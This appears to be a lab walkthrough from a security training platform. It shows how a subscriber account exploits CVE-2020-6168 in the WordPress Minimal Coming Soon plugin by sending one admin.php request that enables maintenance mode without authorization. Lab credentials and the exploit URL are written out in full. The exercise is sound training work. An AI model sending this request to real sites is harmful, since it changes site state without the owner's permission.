WP Minimal Coming Soon Missing Authorization
WP Minimal Coming Soon Missing Authorization
URL https://attackdefense.com/challengedetails?cid=1935
Important Note: This document illustrates all the important steps required to complete this lab.
This is by no means a comprehensive step-by-step solution for this exercise. This is only
provided as a reference to various commands needed to complete this exercise and for your
further research on this topic. Also, note that the IP addresses and domain names might be
different in your lab.
Solution:
Link: https://wpvulndb.com/vulnerabilities/10008
Step 3: The user has to authenticate in order to exploit the vulnerability. The login credentials
are provided in the challenge description.
Credentials:
● Username: attacker
● Password: password1
URL: http://vyaw9gz6ikb2bjhhefc44kbep.stager3.attackdefenselabs.com/wp-login.php
Login Panel:
Subscriber Dashboard:
Step 4: Navigate to the vulnerable URL provided at the exploit URL.
URL:
vyaw9gz6ikb2bjhhefc44kbep.stager3.attackdefenselabs.com/wp-admin/admin.php?action=csm
m_change_status&new_status=enabled&redirect=/wp-admin/
References:
1. WordPress (https://wordpress.org/)
2. Minimal Coming Soon & Maintenance Mode Plugin
(https://wordpress.org/plugins/minimal-coming-soon-maintenance-mode/)
3. CVE-2020-6168 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6168)
4. Minimal Coming Soon & Maintenance Mode < 2.15 - Insecure Permissions: Enable and
Disable Maintenance Mode (https://wpvulndb.com/vulnerabilities/10008)